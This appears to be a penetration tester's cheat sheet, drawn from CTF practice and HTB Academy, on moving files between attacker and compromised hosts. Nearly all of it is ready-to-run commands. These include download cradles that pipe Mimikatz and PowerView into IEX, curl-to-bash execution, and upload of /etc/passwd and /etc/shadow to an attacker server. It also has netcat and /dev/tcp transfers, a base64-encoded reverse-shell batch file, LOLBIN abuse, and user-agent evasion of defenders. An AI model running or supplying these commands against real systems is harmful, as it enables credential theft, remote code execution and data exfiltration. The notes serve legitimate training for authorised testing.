File transfers between target and attacking machine

These notes are from my practice at work, during CTF and from HTB Academy Excellent tip from HTB Academy: Unless specifically requested by a client, we do not recommend exfiltrating data such as Personally Identifiable Information (PII), financial data (i.e., credit card numbers), trade secrets, etc., from a client environment. Instead, if attempting to test Data Loss Prevention (DLP) controls/egress filtering protections, create a file with dummy data that mimics the data that the client is trying to protect.

Verify file integrity

file shell
md5sum shell and compare the result in the attacking machine and target
Get-FileHash "C:\Windows\system32\drivers\etc\hosts" -Algorithm MD5 | select Hash in powershell

Method with no communications required

Encode the file in base64

Note: While this method is convenient, it's not always possible to use. Windows Command Line utility (cmd.exe) has a maximum string length of 8,191 characters. Also, a web shell may error if you attempt to send extremely large strings.

From Attack to target

Get the md5sum of the file (see command above)
Encode a file in bash cat id_rsa |base64 -w 0;echo
Decode it in powershell PS C:\htb> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1CRU[STRIPPED]0tLQo="))
Decode it in bash (if the target is a linux machine) echo -n 'LS0tLS1CRUdJTiBP[STREIPPED]FURSBLRVktLS0tLQo=' | base64 -d > id_rsa
Verify the integrity of the file with Get-FileHash on powershell (see command above)

From target to attack

Get the md5sum of the file (see command above)
Encode a file in Powershell [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
echo -n 'IyBDb3B5cml[STRIPPED]b3N0DQo=' | base64 -d > hosts Decode Base64 String in Linux
Verify the integrity of the file with Get-FileHash on powershell (see command above)

PowerShell Web Downloads

Method

Description

OpenRead

Returns the data from a resource as a Stream.

OpenReadAsync

Returns the data from a resource without blocking the calling thread.

DownloadData

Downloads data from a resource and returns a Byte array.

DownloadDataAsync

Downloads data from a resource and returns a Byte array without blocking the calling thread.

DownloadFile

Downloads data from a resource to a local file.

DownloadFileAsync

Downloads data from a resource to a local file without blocking the calling thread.

DownloadString

Downloads a String from a resource and returns a String.

DownloadStringAsync

Downloads a String from a resource without blocking the calling thread.

PowerShell DownloadString - Fileless Method

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX

PowerShell Invoke-WebRequest

Slower

Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1 You can use the aliases iwr, curl, and wget instead of the Invoke-WebRequest full name.
Powershell Download cradle by HarmJ0y
Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX Use -UseBasicParsing in case first launch config has not been completed in Internet Explorer.
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') Bypass error SSL/TLS error.

PowerShell Web Uploads

PowerShell doesn't have a built-in function for upload operations, but we can use Invoke-WebRequest or Invoke-RestMethod to build our upload function. We'll also need a web server that accepts uploads, which is not a default option in most common webserver utilities.

Installing a Configured WebServer with Upload

On your attack machine

pip3 install uploadserver
python3 -m uploadserver

In your target

Powershell script to upload a file to Python Upload Server

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

Powershell Base64 Web Upload

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

On your attack machine

nc -lvnp 8000 We catch the base64 data with Netcat
echo <base64> | base64 -d -w 0 > hosts We use the base64 application with the decode option to convert the string to the file

PowerShell Session File Transfer

Powershell remoting

To create a PowerShell Remoting session on a remote computer, we will need administrative access, be a member of the Remote Management Users group, or have explicit permissions for PowerShell Remoting in the session configuration

Example from HTB Academy

Test-NetConnection -ComputerName DATABASE01 -Port 5985 From DC01 - Confirm WinRM port TCP 5985 is Open on database01

Because this session already has privileges over DATABASE01, we don't need to specify credentials. In the example below, a session is created to the remote computer named DATABASE01 and stores the results in the variable named $Session.

$Session = New-PSSession -ComputerName DATABASE01 Create a PowerShell Remoting Session to DATABASE01
Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\ Copy samplefile.txt from our Localhost to the DATABASE01 Session
Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session Copy DATABASE.txt from DATABASE01 Session to our localhost

HTTP/S

From attack machine to Target

Attacking machine

In kali we can use python python3 -m http.server 80 or python2.7 -m SimpleHTTPServer if python2
php -S 0.0.0.0:8000 with php
ruby -run -ehttpd . -p8000 with ruby

Target machine

On a win target machine you can access it directly with the browser: http://IP-ATTACKING-MACHINE/FILE-TO-GET or you can use certutil.exe certutil.exe -urlcache http://IP-ATTACKING-MACHINE/FILE-TO-GET file-to-get
In a linux target machine you can use wget http://IP-ATTACKING-MACHINE/FILE-TO-GET or curl curl -o FILE-TO-GET http://IP-ATTACKING-MACHINE/FILE-TO-GET
If you want to execute the file but not download it on a linux taget curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash or wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
With /dev/tcp
- exec 3<>/dev/tcp/10.10.10.32/80 connect to the web server
- echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 get the file with an http get request
- print the resposne cat <&3

Both ways

Updog

Another great tool to transfer is updog, it goes both ways if you can access a browser :D :D :D
pip3 install updog easy as this to install

uploadserver

From our attack machine

Get it here
python3 -m pip install --user uploadserver start the web server
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' create a self signed certificate
mkdir https && cd https start the webserver python3 -m uploadserver 443 --server-certificate /root/server.pem

From our target

curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure (insecure is for the self signed certificate)
wget 192.168.49.128:8000/filetotransfer.txt diwload a file from the target to our attack

Note: When we start a new web server using Python or PHP, it's important to consider that inbound traffic may be blocked. We are transferring a file from our target onto our attack host, but we are not uploading the file

Enable PUT - Nginx

sudo mkdir -p /var/www/uploads/SecretUploadDirectory Create a Directory to Handle Uploaded Files
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory Change the Owner to www-data
Create the nginx config file /etc/nginx/sites-available/upload.conf and put this in it

server {
    listen 9001;
    
    location /SecretUploadDirectory/ {
        root    /var/www/uploads;
        dav_methods PUT;
    }
}

sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/ Symlink our Site to the sites-enabled Directory
sudo systemctl restart nginx.service Start Nginx
In case of error we can check the logs to debug

tail -2 `/var/log/nginx/error.log`

We might need to remove nginx default config if port 80 is busy sudo rm /etc/nginx/sites-enabled/default
Upload file with cURL curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt

FTP

From attack machine to target

Attacking machine

sudo pip3 install pyftpdlib
python3 -m pyftpdlib -p 21 --write this is as anonymous
python3 -m pyftpdlib -p 21 --write -u username -P password we can specify a username and password

Target machine

ftp IP-OF-ATTACKING-MACHINE we can then use get filename to get the file
(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'ftp-file.txt') with powershell
Create a Command File for the FTP Client and Download the Target File

echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

From Target to attack

Attacking machine

python3 -m pyftpdlib -p 21 --write

Target machine

ftp IP-OF-ATTACKING-MACHINE we can then use put filename to send the file
curl --user anonymous:anonymous -o docker-toolbox.exe ftp://10.10.10.236/docker-toolbox.exe
(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts') with powershell
Create a Command File for the FTP Client to Upload a File

echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

SMB

Both ways

Attacking machine

In kali we can use Impacket python3 smbserver.py -smb2support sharename /path/folder or sudo impacket-smbserver share -smb2support /tmp/smbshare
We can specify -username user -password pass if we need set up an authentication

Target machine

In a win victim machine we just need to copy the file to the attacking machine: copy FiletoDownload \\IP-OF-ATTACKING-MACHINE\SHARENAME
If we want to get a file to our target from the attacking machine we just need to copy \\192.168.220.133\share\nc.exe
Sometimes on windows we will be asked to use a service that requires authentication so we can set this up with net use \\<network-location>\<some-share> password /USER:username after this we will be able to use the previous copy command

run SMB over HTTP with WebDav

If there are no SMB (TCP/445) restrictions, you can use impacket-smbserver the same way we set it up for download operations.

To set up our WebDav server, we need to install two Python modules, wsgidav and cheroot

sudo pip install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous Using the WebDav Python module
Connect to the Webdav share
dir \\192.168.49.128\DavWWWRoot Now we can attempt to connect to the share using the DavWWWRoot directory

Note: DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. The DavWWWRoot keyword tells the Mini-Redirector driver, which handles WebDAV requests that you are connecting to the root of the WebDAV server. You can avoid using this keyword if you specify a folder that exists on your server when connecting to the server. For example: \192.168.49.128\sharefolder

Upload file using smb

copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

Metasploit

From attack machine to Target

There is an upload and download feature

SSH (creds needed)

From attack machine to Target (local to remote)

sudo systemctl start ssh start ssh service
netstat -lnpt check ssh for listening port
In your kali or any linux scp FILE-TO-SEND user@ip:/path/to/folder

Note: You can create a temporary user account for file transfers and avoid using your primary credentials or keys on a remote computer.

From target to attack (remote to local)

In your kali or any linux cmd scp user@ip:/path/to/folder FILE-TO-GET

Note

If you get this error protocol error: filename does not match request
You will need to add -T in your command. Here is an example:
scp -T user@server:C:\\Path\\To\\file.txt dest-folder

Netcat

From Target to attack machine

Target machine

nc -lvp PORT-NUMBER > FILE-TO-SEND
nc -l -p 8000 > SharpKatz.exe works too
ncat -l -p 8000 --recv-only > SharpKatz.exe with ncat

Attacking machine

nc VICTIM-IP PORT-NUMBER -w 3 < FILE note: -w is for the time out in seconds
nc -q 0 192.168.49.128 8000 < SharpKatz.exe -q 0 will tell nc to close the connection once it finishes
ncat --send-only 192.168.49.128 8000 < SharpKatz.exe

Attack to target

sudo nc -l -p 443 -q 0 < SharpKatz.exe Attack Host - Sending File as Input to Netcat
sudo ncat -l -p 443 --send-only < SharpKatz.exe same with ncat
nc 192.168.49.128 443 > SharpKatz.exe Compromised Machine Connect to Netcat to Receive the File
ncat 192.168.49.128 443 --recv-only > SharpKatz.exe same with netcat

If we don't have Netcat or Ncat on our compromised machine, Bash supports read/write operations on a pseudo-device file /dev/TCP/. Writing to this particular file makes Bash open a TCP connection to host:port, and this feature may be used for file transfers.

with /dev/tcp

sudo nc -l -p 443 -q 0 < SharpKatz.exe nc - Sending File as Input to nc
sudo ncat -l -p 443 --send-only < SharpKatz.exe same wit ncat
cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe Compromised Machine Connecting to Netcat Using /dev/tcp

RDP

rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files' Mounting a Linux Folder Using rdesktop
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer Mounting a Linux Folder Using xfreerdp
To access the directory, we can connect to \tsclient, allowing us to transfer files to and from the RDP session
Alternatively, from Windows, the native mstsc.exe remote desktop client can be used

Transfering Files with code

Python

python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' python 2
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' python 3

Upload operations

Requests module
urllib
Upload server module
python3 -m uploadserver Starting the Python uploadserver Module
python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})' uploading a file

Here are more details about the onliner to upload a file

# To use the requests function, we need to import the module first.
import requests 
# Define the target URL where we will upload the file.
URL = "http://192.168.49.128:8000/upload"
# Define the file we want to read, open it and save it in a variable.
file = open("/etc/passwd","rb")
# Use a requests POST request to upload the file. 
r = requests.post(url,files={"files":file})

Good advice by HTB Acsademy: We can do the same with any other programming language. A good practice is picking one and trying to build an upload program.

PHP

File get contents module
File put contents module
fopen module
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);' PHP Download with File_get_contents()
php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);' PHP Download with Fopen()
php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash PHP Download a File and Pipe it to Bash

Note: The URL can be used as a filename with the @file function if the fopen wrappers have been enabled.

Ruby

ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))' download a file

Perl

perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");' Download a file

Javascript

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

On a win cmd cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1 Download a File Using JavaScript and cscript.exe

Source: HTB Academy using this post

VBScript

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1 Download a File Using VBScript and cscript.exe

Source HTB Academy using this thread

Protected File Transfers

On Windows

Encrypt files with Invoke-AESEncryption.ps1

We can use any file transfer methods to get this file onto a target host. After the script has been transferred, it only needs to be imported as a module.

Import-Module .\Invoke-AESEncryption.ps1
Invoke-AESEncryption.ps1 -Mode Encrypt -Key "p4ssw0rd" -Path .\scan-results.txt File Encryption example

On Linux

OpenSSL
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc to encrypt /etc/passwd.
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd to decrypt

Living off The Land

LOLBAS - Example with CertReq

CertReq is an example but we could find other binaries as well for this purpose.
certreq
certreq.exe -Post -config http://192.168.49.128/ c:\windows\win.ini upload win.ini in our attack machine. This will send the file to our Netcat session, and we can copy-paste its contents.
sudo nc -lvnp 80 with the listener from our attack machine we should receive the file.

GTFOBINS - Example with OpenSSL

GTFOBINS upload and download
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem Create Certificate in our attack machine
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh Stand up the Server in our attack machine
openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh Download File from the Compromised Machine

Others Living off the Land tools

Bitsadmin

Bitsadmin Download Function
bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe File Download with Bitsadmin
Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32/nc.exe" -Destination "C:\Temp\nc.exe" Download
Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql Upload

Certutil

certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe Download a file

Detection, Evasion and Bypass of protections

Detection

User agents are not only used to identify web browsers, but anything acting as an HTTP client and connecting to a web server via HTTP can have a user agent string (i.e., cURL, a custom Python script, or common tools such as sqlmap, or Nmap).

Organizations can take some steps to identify potential user agent strings by first building a list of known legitimate user agent strings, user agents used by default operating system processes, common user agents used by update services such as Windows Update, and antivirus updates, etc. These can be fed into a SIEM tool used for threat hunting to filter out legitimate traffic and focus on anomalies that may indicate suspicious behavior. Any suspicious-looking user agent strings can then be further investigated to determine whether they were used to perform malicious actions.

Invoke-WebRequest

Client

Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe" 
Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"

Server

GET /nc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0

WinHttpRequest

Client

$h=new-object -com WinHttp.WinHttpRequest.5.1;
$h.open('GET','http://10.10.10.32/nc.exe',$false);
$h.send();
iex $h.ResponseText

Server

GET /nc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Msxml2

Client

$h=New-Object -ComObject Msxml2.XMLHTTP;
$h.open('GET','http://10.10.10.32/nc.exe',$false);
$h.send();
iex $h.responseText

Server

GET /nc.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)

Certutil

Client

certutil -urlcache -split -f http://10.10.10.32/nc.exe 
PS C:\htb> certutil -verifyctl -split -f http://10.10.10.32/nc.exe

Server

GET /nc.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0

BITS

Client

Import-Module bitstransfer;
Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t;
$r=gc $env:temp\t;
rm $env:temp\t; 
iex $r

Server

HEAD /nc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8

Evasion

base64

(See the section above about it)

In some cases, we may not be able to transfer a file. For example, the remote host may have firewall protections that prevent us from downloading a file from our machine. In this type of situation, we can use a simple trick to base64 encode the file into base64 format, and then we can paste the base64 string on the remote server and decode it. For example, if we wanted to transfer a binary file called shell, we can base64 encode it as follows:

base64 shell -w 0

Now, we can copy this base64 string, go to the remote host, and use base64 -d to decode it, and pipe the output into a file:

echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA... <SNIP> ..lIuy9iaW4vc2gAU0iJ51JXSInmDwU | base64 -d > shell

In a windows target we can do this:

echo QGVjaG8gb2ZmCkM6XHRlbXBcbmNhdC5leGUgMTAuMTAuMTQuMiA0NDMgLWUgY21kLmV4ZQo= > data.b64
certutil -decode data.b64 evil.bat

Changing UserAgent

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl list out user agent in Powershell
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "C:\Users\Public\nc.exe" Request with Chrome User Agent from our target machine
nc -lvnp 80 with our nc listener we then get our file in our attack machine

LOLBAS / GTFOBins

Application whitelisting may prevent you from using PowerShell or Netcat, and command-line logging may alert defenders to your presence. In this case, an option may be to use a "LOLBIN" (living off the land binary), alternatively also known as "misplaced trust binaries." An example LOLBIN is the Intel Graphics Driver for Windows 10 (GfxDownloadWrapper.exe), installed on some systems and contains functionality to download configuration files periodically. This download functionality can be invoked as follows:

Transferring File with GfxDownloadWrapper.exe GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"
LOLBAS
GTFOBins

Resources

PreviousRubber ducky NextMaintaining Access

Last updated 1 year ago